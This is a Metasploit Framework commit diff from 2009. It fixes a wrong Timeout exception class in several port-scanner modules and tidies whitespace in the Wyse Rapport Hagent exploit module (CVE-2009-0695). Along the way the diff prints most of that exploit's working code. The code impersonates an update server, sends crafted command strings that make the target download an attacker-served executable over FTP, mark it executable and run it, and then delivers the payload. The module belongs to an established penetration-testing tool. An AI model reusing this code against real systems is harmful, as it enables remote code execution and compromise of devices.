See #434. Fixes up the last of the modules using the wrong Timeout exception class

git-svn-id: file:///home/svn/framework3/trunk@7326 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-02 18:22:50 +00:00 · 2009-11-02 18:22:50 +00:00 · ac14e84eb6
parent 1b5cc24eab
commit ac14e84eb6
5 changed files with 47 additions and 47 deletions
--- a/modules/auxiliary/scanner/ip/ipidseq.rb
+++ b/modules/auxiliary/scanner/ip/ipidseq.rb
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary
 					break
 				end
 			end
-		rescue Timeout::TimeoutError
+		rescue Timeout::Error
 		end

 		return reply
--- a/modules/auxiliary/scanner/portscan/ack.rb
+++ b/modules/auxiliary/scanner/portscan/ack.rb
@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
 					break
 				end
 			end
-		rescue Timeout::TimeoutError
+		rescue Timeout::Error
 		end

 		return reply
--- a/modules/auxiliary/scanner/portscan/syn.rb
+++ b/modules/auxiliary/scanner/portscan/syn.rb
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
 					break
 				end
 			end
-		rescue Timeout::TimeoutError
+		rescue Timeout::Error
 		end

 		return reply
--- a/modules/auxiliary/scanner/portscan/xmas.rb
+++ b/modules/auxiliary/scanner/portscan/xmas.rb
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
 					break
 				end
 			end
-		rescue Timeout::TimeoutError
+		rescue Timeout::Error
 		end

 		return reply
--- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
+++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'Wyse Rapport Hagent Fake Hserver Command Execution',
 			'Description'    => %q{
 				This module exploits the Wyse Rapport Hagent service by pretending to
-			be a legitimate server. This process involves starting both HTTP and 
+			be a legitimate server. This process involves starting both HTTP and
 			FTP services on the attacker side, then contacting the Hagent service of
 			the target and indicating that an update is available. The target will
 			then download the payload wrapped in an executable from the FTP service.
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Stance'         => Msf::Exploit::Stance::Aggressive,
 			'Author'         => 'kf',
 			'Version'        => '$Revision$',
-			'References'     => 
+			'References'     =>
 				[
 					['CVE', '2009-0695'],
 					['OSVDB', '55839'],
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'EXITFUNC' => 'process',
 				},
-			'Targets'        => 
+			'Targets'        =>
 					[
 						[ 'Windows XPe x86',{'Platform' => 'win',}],
 						[ 'Wyse Linux x86', {'Platform' => 'linux',}],
@ -65,20 +65,20 @@ class Metasploit3 < Msf::Exploit::Remote


 	def exploit
-	
+
 		if(datastore['SRVPORT'].to_i != 21)
 			print_error("This exploit requires the FTP service to run on port 21")
 			return
 		end
-		
+
 		# Connect to the target service
 		print_status("Connecting to the target")
 		connect()
-		
+
 		# Start the FTP service
 		print_status("Starting the FTP server")
 		start_service()
-		
+
 		# Create the executable with our payload
 		print_status("Generating the EXE")
 		if target['Platform'] == 'win'
@ -102,55 +102,55 @@ class Metasploit3 < Msf::Exploit::Remote
 				'MsfExploit' => self
 			}
 		})
-		
+
 		wdmserver_port = wdmserver.getsockname[2]
 		print_status("Starting the HTTP service on port #{wdmserver_port}")
-		
-		
+
+
 		fakerapport = Rex::Socket.source_address(rhost)
 		fakemac     = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
 		mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"

-		# FTP Credentials 
+		# FTP Credentials
 		ftpserver = Rex::Socket.source_address(rhost)
 		ftpuser   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
 		ftppass   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
 		ftpport   = 21
 		ftpsecure = '0'

-		incr = 10  
-		pwn1 = 
+		incr = 10
+		pwn1 =
 		"&UP0|&SI=1|UR=9" +
 		"|CO \x0f#{co}\x0f|#{incr}" +
 		# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
-		"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" 
+		"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"

-		pwn2 = 
-	 	"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" 
+		pwn2 =
+	 	"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"

-		pwn3 = 
+		pwn3 =
 		"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
-		# "|RB|#{incr+1}" + 
+		# "|RB|#{incr+1}" +
 		# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
-		#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + 
-		# FTP Paramaters 
+		#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
+		# FTP Paramaters
 		"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
 		"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
 		# No clue
 		"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"

 		if target['Platform'] == 'win'
-			pwn = pwn1 + pwn3 
+			pwn = pwn1 + pwn3
 		elsif target['Platform'] == 'linux'
-			pwn = pwn1 + pwn2 + pwn3 
+			pwn = pwn1 + pwn2 + pwn3
 		end
 		# Send the malicious request
 		sock.put(mal)
-		
+
 		# Download some response data
-		resp = sock.get_once(-1, 10) 
+		resp = sock.get_once(-1, 10)
 		print_status("Received: " + resp)
-		
+
 		print_status("Waiting on a connection to the HTTP service")
 		begin
 			Timeout.timeout(190) do
@ -160,55 +160,55 @@ class Metasploit3 < Msf::Exploit::Remote
 				next if not req
 				next if req.empty?
 				print_status("HTTP Request: #{req.split("\n")[0].strip}")
-				
+
 				case req
  				when /V01/
 		   	 		print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
-					res = pwn 					
+					res = pwn
 				when /V02/
 					print_status("++ device sending V02 query...")
 					res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
 					done = true
-					
+
  				when /V55/
 		  	 		print_status("++ device sending V55 query...")
-					res = pwn 				
+					res = pwn
  				when /POST/  # PUT is used for non encrypted requests.
 		  	 		print_status("++ device sending V55 query...")
-					res = pwn 				
+					res = pwn
 					done = true
 				else
 					print_status("+++ sending generic response...")
-					res = pwn 
+					res = pwn
 				end
-				
+
 				print_status("Sending reply: #{res}")
 				session.put(res)
  				session.close
 			end
 			end
-		rescue ::TimeoutError
+		rescue ::Timeout::Error
 			print_status("Timed out waiting on the HTTP request")
 			wdmserver.close
 			disconnect()
 			stop_service()
 			return
 		end
-		
+
 		print_status("Waiting on the FTP request...")
 		stime = Time.now.to_f
 		while(not @exe_sent)
 			break if (stime + 90 < Time.now.to_f)
-			select(nil, nil, nil, 0.25)	
+			select(nil, nil, nil, 0.25)
 		end
-		
+
 		if(not @exe_sent)
 			print_status("No executable sent :(")
 		end
-		
+
 		stop_service()
 		wdmserver.close()
-		
+
 		handler
 		disconnect
 	end
@ -220,19 +220,19 @@ class Metasploit3 < Msf::Exploit::Remote
 			c.put("425 Can't build data connection\r\n")
 			return
 		end
-		
+
 		c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
 		conn.put(@exe_file)
 		c.put("226 Transfer complete.\r\n")
 		conn.close
 		@exe_sent = true
 	end
-	
+
 	def on_client_command_size(c,arg)
 		print_status("#{@state[c][:name]} FTP size request for #{arg}")
 		c.put("213 #{@exe_file.length}\r\n")
 	end


-end
-
+end
+